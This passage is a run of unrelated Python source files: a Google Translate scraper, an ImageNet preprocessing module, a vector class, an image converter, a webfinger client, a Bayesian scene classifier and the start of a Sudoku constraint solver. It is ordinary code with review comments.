        'ssel=0', 'tsel=0', 'kc=2',
        'tk=' + str(tk), 'q=' + text,
    ]
    return 'https://translate.google.cn/translate_a/single?' + '&'.join(params)
def translate(js, text, type):
    """Translate *text* via the Google Translate web endpoint.

    Arguments:
        js   -- Py4Js instance used to compute the request token
        text -- the text to translate
        type -- direction: 'e2c' (English->Chinese) or 'c2e' (Chinese->English)

    Returns the translated string, or '' on any request/parse failure.
    Raises ValueError for an unknown *type*: the original code left `url`
    unassigned in that case, and the except handler's `print(url)` then
    raised an uncaught NameError.
    """
    # NOTE(review): this header dict is built but never passed to
    # requests.get — presumably `requests.get(url, headers=header)` was
    # intended; left unchanged to preserve current behavior.
    header = {
        'authority': 'translate.google.cn',
        'method': 'GET',
        'path': '',
        'scheme': 'https',
        'accept': '*/*',
        'accept-encoding': 'gzip, deflate, br',
        'accept-language': 'zh-CN,zh;q=0.9',
        'cookie': '',
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',
        'x-client-data': 'CIa2yQEIpbbJAQjBtskBCPqcygEIqZ3KAQioo8oBGJGjygE='
    }
    if type == 'e2c':
        url = buildUrl_e2c(text, js.getTk(text))
    elif type == 'c2e':
        url = buildUrl_c2e(text, js.getTk(text))
    else:
        raise ValueError("type must be 'e2c' or 'c2e', got %r" % (type,))
    res = ''
    try:
        r = requests.get(url)
        result = json.loads(r.text)
        if result[7] is not None and len(result[7]) != 0:
            # result[7] holds a "did you mean xxx" suggestion; re-translate
            # the corrected text and return that instead
            try:
                correctText = result[7][0].replace('<b><i>', ' ').replace('</i></b>', '')
                print(correctText)
                if type == 'e2c':
                    correctUrl = buildUrl_e2c(correctText, js.getTk(correctText))
                else:
                    correctUrl = buildUrl_c2e(correctText, js.getTk(correctText))
                correctR = requests.get(correctUrl)
                newResult = json.loads(correctR.text)
                res = newResult[0][0][0]
            except Exception as e:
                print(e)
                res = ''
        else:
            res = result[0][0][0]
    except Exception as e:
        res = ''
        print(url)
        print("翻译" + text + "失败")
        print("错误信息:")
        print(e)
    finally:
        # NOTE: returning from `finally` swallows any in-flight exception;
        # kept to preserve the original best-effort contract.
        return res
if __name__ == '__main__':
    # Smoke test for both directions; requires network access to
    # translate.google.cn and the Py4Js helper defined earlier in this file.
    js=Py4Js()
    res=translate(js, '你好啊', 'c2e')
    print("中文转英文:", res)
    res=translate(js, 'hello', 'e2c')
    print("英文转中文:", res)
|
# Comments still to be written (TBD).
# Stub of a rock-paper-scissors round: choices are hard-coded for now.
player_choice = "p"
computer_choice = "n"
print("Ty wybrałeś", player_choice)
print("Ja wybrałem", computer_choice)
print("Wygrałem, yay! :P")
|
#!/usr/bin/env python3
import os
import numpy as np
## Processing in batches:
#
BATCH_SIZE = int(os.getenv('CK_BATCH_SIZE', 1))

## Model properties:
#
# NOTE(review): if none of the fallback env vars is set, int('') below raises
# ValueError at import time — presumably an intentional fail-fast; confirm.
MODEL_IMAGE_HEIGHT = int(os.getenv('ML_MODEL_IMAGE_HEIGHT',
                         os.getenv('CK_ENV_ONNX_MODEL_IMAGE_HEIGHT',
                         os.getenv('CK_ENV_TENSORFLOW_MODEL_IMAGE_HEIGHT',
                         ''))))
MODEL_IMAGE_WIDTH = int(os.getenv('ML_MODEL_IMAGE_WIDTH',
                        os.getenv('CK_ENV_ONNX_MODEL_IMAGE_WIDTH',
                        os.getenv('CK_ENV_TENSORFLOW_MODEL_IMAGE_WIDTH',
                        ''))))
MODEL_IMAGE_CHANNELS = int(os.getenv('ML_MODEL_IMAGE_CHANNELS', 3))
MODEL_DATA_LAYOUT = os.getenv('ML_MODEL_DATA_LAYOUT', 'NCHW')
MODEL_COLOURS_BGR = os.getenv('ML_MODEL_COLOUR_CHANNELS_BGR', 'NO') in ('YES', 'yes', 'ON', 'on', '1')
MODEL_INPUT_DATA_TYPE = os.getenv('ML_MODEL_INPUT_DATA_TYPE', 'float32')
MODEL_DATA_TYPE = os.getenv('ML_MODEL_DATA_TYPE', '(unknown)')
MODEL_USE_DLA = os.getenv('ML_MODEL_USE_DLA', 'NO') in ('YES', 'yes', 'ON', 'on', '1')
MODEL_MAX_BATCH_SIZE = int(os.getenv('ML_MODEL_MAX_BATCH_SIZE', BATCH_SIZE))

## Internal processing:
#
INTERMEDIATE_DATA_TYPE = np.float32  # default for internal conversion
#INTERMEDIATE_DATA_TYPE = np.int8  # affects the accuracy a bit

## Image normalization:
#
# NOTE(review): unlike the other flags this one has no 'NO' default, so an
# unset variable simply evaluates to False.
MODEL_NORMALIZE_DATA = os.getenv('ML_MODEL_NORMALIZE_DATA') in ('YES', 'yes', 'ON', 'on', '1')
MODEL_NORMALIZE_LOWER = float(os.getenv('ML_MODEL_NORMALIZE_LOWER', -1.0))
MODEL_NORMALIZE_UPPER = float(os.getenv('ML_MODEL_NORMALIZE_UPPER', 1.0))
SUBTRACT_MEAN = os.getenv('ML_MODEL_SUBTRACT_MEAN', 'YES') in ('YES', 'yes', 'ON', 'on', '1')
# Space-separated per-channel values, e.g. "123.68 116.78 103.94".
GIVEN_CHANNEL_MEANS = os.getenv('ML_MODEL_GIVEN_CHANNEL_MEANS', '')
if GIVEN_CHANNEL_MEANS:
    GIVEN_CHANNEL_MEANS = np.fromstring(GIVEN_CHANNEL_MEANS, dtype=np.float32, sep=' ').astype(INTERMEDIATE_DATA_TYPE)
    if MODEL_COLOURS_BGR:
        GIVEN_CHANNEL_MEANS = GIVEN_CHANNEL_MEANS[::-1]  # swapping Red and Blue colour channels
GIVEN_CHANNEL_STDS = os.getenv('ML_MODEL_GIVEN_CHANNEL_STDS', '')
if GIVEN_CHANNEL_STDS:
    GIVEN_CHANNEL_STDS = np.fromstring(GIVEN_CHANNEL_STDS, dtype=np.float32, sep=' ').astype(INTERMEDIATE_DATA_TYPE)
    if MODEL_COLOURS_BGR:
        GIVEN_CHANNEL_STDS = GIVEN_CHANNEL_STDS[::-1]  # swapping Red and Blue colour channels

## ImageNet dataset properties:
#
LABELS_PATH = os.environ['CK_CAFFE_IMAGENET_SYNSET_WORDS_TXT']

## Preprocessed input images' properties:
#
IMAGE_DIR = os.getenv('CK_ENV_DATASET_IMAGENET_PREPROCESSED_DIR')
IMAGE_LIST_FILE_NAME = os.getenv('CK_ENV_DATASET_IMAGENET_PREPROCESSED_SUBSET_FOF')
IMAGE_LIST_FILE = os.path.join(IMAGE_DIR, IMAGE_LIST_FILE_NAME)
IMAGE_DATA_TYPE = os.getenv('CK_ENV_DATASET_IMAGENET_PREPROCESSED_DATA_TYPE', 'uint8')
def load_labels(labels_filepath):
    """Read class labels from a text file, one label per line.

    Args:
        labels_filepath: path to a text file with one label per line.

    Returns:
        List of whitespace-stripped label strings, in file order.
    """
    # Use a context manager so the file handle is always closed
    # (the original left it open).
    with open(labels_filepath, 'r') as input_file:
        return [line.strip() for line in input_file]
# Human-readable class labels, loaded once at import time.
class_labels = load_labels(LABELS_PATH)

# Load preprocessed image filenames:
with open(IMAGE_LIST_FILE, 'r') as f:
    image_list = [ s.strip() for s in f ]
def load_image_by_index_and_normalize(image_index):
    """Load one preprocessed image by index and normalize it for the model.

    Reads a raw pixel dump from IMAGE_DIR, applies the configured colour
    order, normalization and mean/std adjustments, then converts to the
    model's data layout and input dtype.

    Args:
        image_index: position into the module-level ``image_list``.

    Returns:
        numpy array in MODEL_DATA_LAYOUT order, dtype MODEL_INPUT_DATA_TYPE.
    """
    img_file = os.path.join(IMAGE_DIR, image_list[image_index])
    # Files are headerless pixel dumps: H*W*C values of IMAGE_DATA_TYPE.
    img = np.fromfile(img_file, np.dtype(IMAGE_DATA_TYPE))
    img = img.reshape((MODEL_IMAGE_HEIGHT, MODEL_IMAGE_WIDTH, MODEL_IMAGE_CHANNELS))
    if MODEL_COLOURS_BGR:
        img = img[...,::-1]  # swapping Red and Blue colour channels
    if IMAGE_DATA_TYPE != 'float32':
        img = img.astype(np.float32)
    # Normalize
    if MODEL_NORMALIZE_DATA:
        # Linearly rescale [0, 255] to [MODEL_NORMALIZE_LOWER, MODEL_NORMALIZE_UPPER].
        img /= (255.0/(MODEL_NORMALIZE_UPPER-MODEL_NORMALIZE_LOWER))
        img += MODEL_NORMALIZE_LOWER
    # Subtract mean value
    if len(GIVEN_CHANNEL_MEANS):
        img -= GIVEN_CHANNEL_MEANS
    elif SUBTRACT_MEAN:
        # No explicit means configured: subtract this image's own per-channel mean.
        img -= np.mean(img, axis=(0,1), keepdims=True)
    if len(GIVEN_CHANNEL_STDS):
        img /= GIVEN_CHANNEL_STDS
    if MODEL_INPUT_DATA_TYPE == 'int8' or INTERMEDIATE_DATA_TYPE==np.int8:
        # Clamp into the int8 range before the narrowing conversion.
        img = np.clip(img, -128, 127).astype(INTERMEDIATE_DATA_TYPE)
    if MODEL_DATA_LAYOUT == 'NCHW':
        img = img.transpose(2,0,1)  # HWC -> CHW
    elif MODEL_DATA_LAYOUT == 'CHW4':
        # Pad the channel dimension from 3 to 4 with zeros.
        img = np.pad(img, ((0,0), (0,0), (0,1)), 'constant')
    # Add img to batch
    return img.astype(MODEL_INPUT_DATA_TYPE)
def load_preprocessed_batch(image_list, image_index):
    """Assemble one batch of normalized images starting at *image_index*.

    Note: images are read via the module-level image list inside
    load_image_by_index_and_normalize; the *image_list* parameter is kept
    for interface compatibility.

    Returns:
        Tuple of (batch array, index of the first image NOT consumed).
    """
    batch_data = None
    for slot in range(BATCH_SIZE):
        sample = load_image_by_index_and_normalize(image_index)
        if batch_data is None:
            # Allocate lazily once the per-image shape is known.
            batch_data = np.empty((BATCH_SIZE, *sample.shape), dtype=MODEL_INPUT_DATA_TYPE)
        batch_data[slot] = sample
        image_index += 1
    #print('Data shape: {}'.format(batch_data.shape))
    if MODEL_USE_DLA and MODEL_MAX_BATCH_SIZE > len(batch_data):
        # DLA engines require full batches: zero-pad up to the max batch size.
        pad_rows = MODEL_MAX_BATCH_SIZE - len(batch_data)
        padded = np.pad(batch_data, ((0, pad_rows), (0, 0), (0, 0), (0, 0)), 'constant')
        return padded, image_index
    return batch_data, image_index
|
import math


def n_length_vector(length, defaults=[], init=False):
    """Create a vector class of dimension *length*.

    Args:
        length: number of components the vector holds.
        defaults: component values used when *init* is True.
        init: when True, return an instance built from *defaults* instead of
            the class itself.

    Returns:
        The generated class, or an instance of it when *init* is True.
    """

    def _is_scalar(other):
        # Deliberately exact type checks (no bool / numpy scalars),
        # preserving the historical behaviour of the hand-written operators.
        return type(other) is int or type(other) is float

    def _binop(op):
        """Build a binary dunder applying *op* component-wise.

        Scalars are broadcast to every component.  A shorter `self` is
        padded with zeros up to the other operand's length; components
        missing on *other* keep the self/padded value.
        """
        def method(self, other):
            if _is_scalar(other):
                vals = [op(c, other) for c in self.value]
                return n_length_vector(len(vals), defaults=vals, init=True)
            vals = self.value.copy()
            # BUG FIX: __add__ used `while len(x) > len(self.value)` (never
            # true), silently truncating when the other vector was longer;
            # all operators now pad consistently.
            while len(vals) < len(other.value):
                vals.append(0)
            for i in range(len(vals)):
                try:
                    vals[i] = op(vals[i], other.value[i])
                except Exception:
                    pass
            return n_length_vector(len(vals), defaults=vals, init=True)
        return method

    def _mapop(op):
        """Build a unary dunder applying *op* to each component, skipping failures."""
        def method(self):
            vals = self.value.copy()
            for i in range(len(vals)):
                try:
                    vals[i] = op(vals[i])
                except Exception:
                    pass
            return n_length_vector(len(vals), defaults=vals, init=True)
        return method

    def _component(index):
        """Build a read/write property for component *index*.

        BUG FIX: the original decorated the setters under different names
        (set_x, ...), so `v.x = ...` raised AttributeError.
        """
        def getter(self):
            return self.value[index]

        def setter(self, value):
            self.value[index] = value
        return property(getter, setter)

    class _vector:
        def __init__(self, *args):
            self.size = length
            self.value = []
            # Nested _vector arguments are flattened into their components.
            self.value.extend(expand_vectors(args))
            if len(self.value) != self.size:
                raise Exception(f'Can only specify {self.size} values for Vector[{self.size}], but {len(self.value)} were given.')

        def __repr__(self):
            return f'Vector{self.size}({str(self.value).strip("[]")})'

        __str__ = __repr__

        def __neg__(self):
            vals = [-c for c in self.value]
            return n_length_vector(len(vals), defaults=vals, init=True)

        def __pos__(self):
            # NOTE: unary + takes the absolute value of each component,
            # mirroring the original implementation.
            vals = [abs(c) for c in self.value]
            return n_length_vector(len(vals), defaults=vals, init=True)

        # Component-wise arithmetic / bitwise operators (scalar broadcast).
        __add__ = _binop(lambda a, b: a + b)
        __sub__ = _binop(lambda a, b: a - b)
        __mul__ = _binop(lambda a, b: a * b)
        __truediv__ = _binop(lambda a, b: a / b)
        __floordiv__ = _binop(lambda a, b: a // b)
        __mod__ = _binop(lambda a, b: a % b)
        __pow__ = _binop(lambda a, b: a ** b)
        __lshift__ = _binop(lambda a, b: a << b)
        __rshift__ = _binop(lambda a, b: a >> b)
        __and__ = _binop(lambda a, b: a & b)
        __or__ = _binop(lambda a, b: a | b)
        __xor__ = _binop(lambda a, b: a ^ b)

        # Component-wise unary operators.
        __invert__ = _mapop(lambda c: ~c)
        __abs__ = _mapop(abs)
        __floor__ = _mapop(math.floor)
        __ceil__ = _mapop(math.ceil)
        __trunc__ = _mapop(math.trunc)

        def __round__(self, ndigits=None):
            # ndigits now defaults to None so plain round(v) works too.
            vals = self.value.copy()
            for i in range(len(vals)):
                try:
                    vals[i] = round(vals[i], ndigits)
                except Exception:
                    pass
            return n_length_vector(len(vals), defaults=vals, init=True)

        def __getitem__(self, item):
            return self.value[item]

        def __setitem__(self, item, value):
            self.value[item] = value

        def __iter__(self):
            # Iterate over a copy so callers cannot mutate the vector.
            return iter(self.value.copy())

        # Named accessors for the first three components.
        x = _component(0)
        y = _component(1)
        z = _component(2)

    if init:
        return _vector(*defaults)
    return _vector


class _vectorPrefix:
    """Indexing helper so that Vector[n] yields an n-dimensional vector class."""

    def __getitem__(self, size):
        if not str(size).isdigit():
            raise SyntaxError(f'Unexpected "{size}"')
        return n_length_vector(length=int(size), init=False)


def expand_vectors(array):
    """Flatten any _vector instances in *array* into their components.

    Non-vector items are passed through unchanged.
    """
    out = []
    for item in array:
        if type(item).__name__ == '_vector':
            out.extend(item)
        else:
            out.append(item)
    return out


Vector = _vectorPrefix()

__all__ = ["Vector", "expand_vectors"]
|
import sys
import os
from PIL import Image
import glob
# Grab the first and second arguments (source and destination folders) from the command line.
def main(args):
    """Entry point: convert every .jpg in args[0] into a .png in args[1].

    Args:
        args: command-line arguments without the program name;
            args[0] is the source folder, args[1] the destination folder.
    """
    # BUG FIX: exactly one argument used to crash with IndexError on args[1];
    # validate both arguments up front instead.
    if len(args) < 2:
        print('Usage: python Project_JPG_to_PNG_converter.py <img_folder> <new_img_folder>')
        return
    img_folder = args[0]
    new_img_folder = args[1]
    if os.path.exists(img_folder) and os.path.isdir(img_folder):
        # Create the destination folder if it does not exist yet.
        if not (os.path.exists(new_img_folder) and os.path.isdir(new_img_folder)):
            os.mkdir(new_img_folder)
        convert_jpg_to_png(img_folder, new_img_folder)
    else:
        print(f'There is no {img_folder} folder. Please try again.')
def convert_jpg_to_png(img_folder, new_img_folder):
    """Convert every .jpg in *img_folder* to a .png in *new_img_folder*.

    Args:
        img_folder: existing folder containing .jpg images.
        new_img_folder: existing folder the .png files are written into.
    """
    # Loop through the source folder's JPEG files.
    for file in glob.iglob(os.path.join(img_folder, '*.jpg')):
        img = Image.open(file)
        # BUG FIX: str.strip removed *character sets*, not a prefix/suffix,
        # mangling names such as 'pg1.jpg'; derive the stem properly instead.
        file_name = os.path.splitext(os.path.basename(file))[0]
        # BUG FIX: the save call was commented out, so nothing was converted;
        # also join the path explicitly instead of string concatenation.
        img.save(os.path.join(new_img_folder, file_name + '.png'), 'png')
if __name__ == "__main__":
    # Pass only the user-supplied arguments (skip the script name).
    sys.exit(main(sys.argv[1:]))
# How to run: python <script> <source_folder> <destination_folder>
# e.g. python Project_JPG_to_PNG_converter.py pokedex/ pokedex/new
"""
Taken from: https://github.com/jcarbaugh/python-webfinger
LICENSE:
Copyright (c) 2010, Jeremy Carbaugh
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Jeremy Carbaugh nor the names of its contributors may be
used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from xrd import XRD
import urllib, urllib2
# Friendly attribute names mapped to the XRD link-relation URIs they resolve
# to (consumed by WebFingerResponse.__getattr__).
RELS = {
    'avatar': 'http://webfinger.net/rel/avatar',
    'hcard': 'http://microformats.org/profile/hcard',
    'open_id': 'http://specs.openid.net/auth/2.0/provider',
    'portable_contacts': 'http://portablecontacts.net/spec/1.0',
    'profile': 'http://webfinger.net/rel/profile-page',
    'xfn': 'http://gmpg.org/xfn/11',
}

# Accepted link-relation types for the webfinger/LRDD template, newest first.
WEBFINGER_TYPES = (
    'lrdd',  # current
    'http://lrdd.net/rel/descriptor',  # deprecated on 12/11/2009
    'http://webfinger.net/rel/acct-desc',  # deprecated on 11/26/2009
    'http://webfinger.info/rel/service',  # deprecated on 09/17/2009
)
class WebFingerExpection(Exception):
    """Raised when a webfinger lookup fails (e.g. host-meta host mismatch).

    NOTE(review): the class name misspells "Exception"; it is kept as-is
    because external callers may already catch it under this name.
    """
    pass
class WebFingerResponse(object):
    """Thin wrapper around a parsed XRD document.

    Well-known relation names (keys of RELS) are exposed as attributes that
    resolve to the matching link's href; any other attribute access is
    delegated to the underlying XRD object.
    """

    def __init__(self, xrd):
        self._xrd = xrd

    def __getattr__(self, name):
        # Only called for attributes not found normally, so _xrd itself
        # never recurses through here.
        if name in RELS:
            return self._xrd.find_link(RELS[name], attr='href')
        return getattr(self._xrd, name)
class WebFingerClient(object):
    """Minimal webfinger/LRDD client for a single host.

    NOTE(review): Python 2 code (urllib/urllib2); performs network I/O.
    """

    def __init__(self, host, secure=False):
        # secure=True switches the host-meta fetch to HTTPS.
        self._host = host
        self._secure = secure
        self._opener = urllib2.build_opener(urllib2.HTTPRedirectHandler())
        self._opener.addheaders = [('User-agent', 'python-webfinger')]

    def _hm_hosts(self, xrd):
        # Hosts declared via the host-meta 'hm:Host' extension elements.
        return [e.value for e in xrd.elements if e.name == 'hm:Host']

    def xrd(self, url, raw=False):
        """Fetch *url* and return the body, parsed as XRD unless raw=True."""
        conn = self._opener.open(url)
        response = conn.read()
        conn.close()
        return response if raw else XRD.parse(response)

    def hostmeta(self):
        """Fetch and parse this host's /.well-known/host-meta document."""
        protocol = "https" if self._secure else "http"
        hostmeta_url = "%s://%s/.well-known/host-meta" % (protocol, self._host)
        return self.xrd(hostmeta_url)

    def finger(self, username):
        """Resolve *username* on this host to a WebFingerResponse.

        Raises WebFingerExpection when host-meta does not list this host.
        """
        hm = self.hostmeta()
        hm_hosts = self._hm_hosts(hm)
        if self._host not in hm_hosts:
            raise WebFingerExpection("hostmeta host did not match account host")
        # Fill the {uri} placeholder of the LRDD template with the
        # percent-encoded acct: URI for this account.
        template = hm.find_link(WEBFINGER_TYPES, attr='template')
        xrd_url = template.replace('{uri}',
                                   urllib.quote_plus('acct:%s@%s' % (username, self._host)))
        return WebFingerResponse(self.xrd(xrd_url))
def finger(identifier, secure=False):
    """Convenience helper: finger 'user@host' or 'acct:user@host'.

    Args:
        identifier: account identifier, optionally prefixed with 'acct:'.
        secure: when True, fetch host-meta over HTTPS.

    Returns:
        The WebFingerResponse for the account.
    """
    if identifier.startswith('acct:'):
        # Drop the scheme; keep everything after the first colon.
        identifier = identifier.split(':', 1)[1]
    username, host = identifier.split('@')
    client = WebFingerClient(host, secure)
    return client.finger(username)
# example main method
if __name__ == '__main__':
    import sys
    # NOTE(review): Python 2 syntax (print statements) — do not run under
    # Python 3.  Usage: python webfinger.py user@example.com
    wf = finger(sys.argv[1], True)
    print "Avatar: ", wf.avatar
    print "HCard: ", wf.hcard
    print "OpenID: ", wf.open_id
    print "Profile:", wf.profile
    print "XFN: ", wf.find_link('http://gmpg.org/xfn/11', attr='href')
|
import os
import sys
# Run from the script's own directory so relative paths (params.pkl, the
# image database) resolve regardless of the caller's cwd.
abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
os.chdir(dname)
from src.classifier.bayesian_classifier import BayesianClassifier
from src.classifier.classify import classify
from src.classifier.subclasses import subclass, subclass_param_threshold
from src.images import ImageCollection, export_collection
from src.metrics.fisher_criterion import analyze_fisher_discriminant
from src.params.extract_param import *
from src.params.param import param_nd, param_remove_unused
import matplotlib.pyplot as plt
import pickle as pkl
from src.visualization import plot_sub_params
from skimage import color as skic
from src.images import rgb_to_cmyk
sys.path.append('../')
CDIR = os.path.dirname(os.path.realpath(__file__))
images_path = os.path.join(CDIR, '../baseDeDonneesImages')
# Load images
coast = ImageCollection(base_path=images_path, filter_name="coast")
forest = ImageCollection(base_path=images_path, filter_name="forest")
street = ImageCollection(base_path=images_path, filter_name="street")
categorized_collection = {"coast": coast, "forest": forest, "street": street}
# Display labels (French) for the seven extracted parameters, in the same
# order as the extractor list passed to param_nd below.
param_labels = ['Moyenne Jaune', 'Médiane Bleu', 'Écart-type Vert', 'Moyenne Rouge', 'Moyenne Bleu',
                'Moyenne Projection en Rouge', 'Écart-type de la luminosité']
# Extract parameters from images or load them from the .pkl
# Set RELOAD_PARAMS = True to recompute features (slow); False reuses the
# cached params.pkl from a previous run.
RELOAD_PARAMS = False
if RELOAD_PARAMS:
    params = param_nd(categorized_collection, [(extractor_mean, {'dimension': 2, 'base_function': rgb_to_cmyk}),
                                               (extractor_median, {'dimension': 2, }),
                                               (extractor_std, {'dimension': 1, }),
                                               (extractor_mean, {'dimension': 0, }),
                                               (extractor_mean, {'dimension': 2, }),
                                               (extractor_mean, {'dimension': 2, 'base_function': skic.rgb2yuv}),
                                               (extractor_std, {'dimension': 2, 'base_function': skic.rgb2hsv})
                                               ], num_images=-1)
    f = open("params.pkl", "wb")
    pkl.dump(params, f)
    f.close()
else:
    f = open("params.pkl", "rb")
    params = pkl.load(f)
    f.close()
# Tuple of dimensions to visualize
view = (1, 3)
plot_sub_params(params, view, param_labels)
# Extract subclasses
# Split each category on parameter 5 (mean red projection) at 0.05.
params = subclass(params, 'coast', subclass_param_threshold, param_idx=5, threshold=0.05)
params = subclass(params, 'forest', subclass_param_threshold, param_idx=5, threshold=0.05)
# Visualization
plot_sub_params(params, view, param_labels, ellipsis=True)
analyze_fisher_discriminant(params)
# Create the classifier and classify images
bayes2 = BayesianClassifier(params, bins=10)
classify(params, bayes2.fit_multiple, likelihood='gaussian', visualize_errors_dims=view)
#export_collection({k: v['image_names'] for k, v in params.items()}, "collection.pkl")
# Plot bayes boundaries by creating a new classifier with only two of the original dimensions
params = param_remove_unused(params, [0, 1, 2, 5, 6])
bayes3 = BayesianClassifier(params, bins=10)
bayes3.display_decision_boundary((0, 1), likelihood='gaussian')
plt.show()
|
# Sudoku
import itertools
import re
from functools import reduce
from .csp import CSP
def flatten(seqs):
    """Concatenate a sequence of lists into a single flat list.

    Args:
        seqs: iterable of lists.

    Returns:
        One list containing the items of every list in order.
    """
    # itertools.chain avoids the quadratic behaviour of sum(seqs, []).
    return list(itertools.chain.from_iterable(seqs))
# 81-character puzzle strings read row by row; digits are givens and '.'
# marks an empty cell (see Sudoku.__init__).
easy1 = '..3.2.6..9..3.5..1..18.64....81.29..7.......8..67.82....26.95..8..2.3..9..5.1.3..'
harder1 = '4173698.5.3..........7......2.....6.....8.4......1.......6.3.7.5..2.....1.4......'
def different_values_constraint(_A, a, _B, b):
    """A constraint saying two neighboring variables must differ in value."""
    if a == b:
        return False
    return True
class Sudoku(CSP):
    """A Sudoku problem.
    The box grid is a 3x3 array of boxes, each a 3x3 array of cells.
    Each cell holds a digit in 1..9. In each box, all digits are
    different; the same for each row and column as a 9x9 grid.
    >>> e = Sudoku(easy1)
    Method infer_assignment shows the puzzle with all of the variables
    that are currently assigned. Since we haven't inferred anything,
    this shows the initial puzzle assignments that are given in the problem.
    >>> e.display(e.infer_assignment())
    . . 3 | . 2 . | 6 . .
    9 . . | 3 . 5 | . . 1
    . . 1 | 8 . 6 | 4 . .
    ------+-------+------
    . . 8 | 1 . 2 | 9 . .
    7 . . | . . . | . . 8
    . . 6 | 7 . 8 | 2 . .
    ------+-------+------
    . . 2 | 6 . 9 | 5 . .
    8 . . | 2 . 3 | . . 9
    . . 5 | . 1 . | 3 . .
    AC3 will mutate the state of the puzzle to reduce variable domains as
    much as possible by constraint propagation.
    We see that the easy puzzle is solved by AC3.
    >>> AC3(e); e.display(e.infer_assignment())
    True
    4 8 3 | 9 2 1 | 6 5 7
    9 6 7 | 3 4 5 | 8 2 1
    2 5 1 | 8 7 6 | 4 9 3
    ------+-------+------
    5 4 8 | 1 3 2 | 9 7 6
    7 2 9 | 5 6 4 | 1 3 8
    1 3 6 | 7 9 8 | 2 4 5
    ------+-------+------
    3 7 2 | 6 8 9 | 5 1 4
    8 1 4 | 2 5 3 | 7 6 9
    6 9 5 | 4 1 7 | 3 8 2
    We could test if it was solved using Soduko's parent class goal_test method
    s.goal_test(s.curr_domains)
    True
    This one is harder and AC3 does not help much at all:
    >>> h = Sudoku(harder1)
    Initial problem:
    4 1 7 | 3 6 9 | 8 . 5
    . 3 . | . . . | . . .
    . . . | 7 . . | . . .
    ------+-------+------
    . 2 . | . . . | . 6 .
    . . . | . 8 . | 4 . .
    . . . | . 1 . | . . .
    ------+-------+------
    . . . | 6 . 3 | . 7 .
    5 . . | 2 . . | . . .
    1 . 4 | . . . | . . .
    After AC3 constraint propagation
    4 1 7 | 3 6 9 | 8 2 5
    . 3 . | . . . | . . .
    . . . | 7 . . | . . .
    ------+-------+------
    . 2 . | . . . | . 6 .
    . . . | . 8 . | 4 . .
    . . . | . 1 . | . . .
    ------+-------+------
    . . . | 6 . 3 | . 7 .
    5 . . | 2 . . | . . .
    1 . 4 | . . . | . . .
    To solve this, we need to use backtracking_search which also mutates
    the object given to it.
    >>> solved = backtracking_search(h, select_unassigned_variable=mrv,
                inference=forward_checking) is not None
    If solved is True, the puzzle can be displayed with as above.
    """
    R3 = list(range(3))  # All Sudoku puzzles use 3x3 grids, one side
    # Generate board of fixed size 3x3 sets of 3x3 boxes
    # Use Cell to generate integers for each box (variables are numbers)
    # NOTE: Cell is a class attribute, so the counter is shared by every
    # Sudoku instance — variable numbers keep increasing across instances.
    Cell = itertools.count().__next__

    def __init__(self, grid):
        """Build a Sudoku problem from a string representing the grid:
        the digits 1-9 denote a filled cell, '.' or '0' an empty one;
        other characters are ignored."""
        # Build a grid of variables. Variables are numbered
        # and the grid is 4 dimensional.
        # Grid looks like the following:
        # 00 01 02 | 09 10 11 | 18 19 20
        # 03 04 05 | 12 13 14 | 21 22 23
        # 06 07 08 | 15 16 17 | 24 25 26
        # -------------------------------
        # 27 28 29 | 36 ...   | 45 ...
        # 30 31 32 |
        # 33 34 35 |
        # -------------------------------
        # 54 55 56 | 63 64 65 | 72 73 74
        # 57 58 59 | 66 67 68 | 75 76 77
        # 60 61 62 | 69 70 71 | 78 79 80
        #
        # self.bgrid[i][j] is a double list for a box.
        # In the above variable set, the bottom right
        # is self.bgrid[2][2]
        # [[72, 73, 74], [75, 76, 77], [78, 79, 80]]
        # The final two dimensions are the row and column
        # within the box. self.bgrid[2][2][0][1] = 73
        self.bgrid = [[
            # one box
            [[self.Cell() for _x in self.R3] for _y in self.R3]
            # series of boxes bx, by
            for _bx in self.R3
        ]
            for _by in self.R3
        ]
        # list of variables in each box, self.boxes[0] = [0, 1, ... 8]
        self.boxes = flatten([list(map(flatten, brow)) for brow in self.bgrid])
        # list of variables in each row
        # self.rows[0] = [0, 1, 2, 9, 10, 11, 18, 19, 20]
        self.rows = flatten([list(map(flatten, zip(*brow))) for brow in self.bgrid])
        # list of variables in each column
        self.cols = list(zip(*self.rows))
        # Build the neighbors list
        # It should be implemented as a dictionary.
        # Keys are the variables names (numbers) and values are a set
        # Each variable should have a set associated with it containing
        # all of the variables that have constraints. As an example,
        # if variable 100 had constraints between itself and variables
        # 103 and 104, self.neighbors[100] would contain a set with members
        # 103, and 104.
        #
        # See Python library reference if you are not familiar with sets
        # Tutorial: https://www.learnpython.org/en/Sets
        # Build dictionary of list of variables
        self.neighbors = {v: set() for v in flatten(self.rows)}
        # Populate with all variables that are neighbors of the
        # unit.
        for unit in map(set, self.boxes + self.rows + self.cols):
            for v in unit:
                self.neighbors[v].update(unit - {v})
        # One token per cell: a digit or '.'; other characters are ignored.
        squares = iter(re.findall(r'\d|\.', grid))
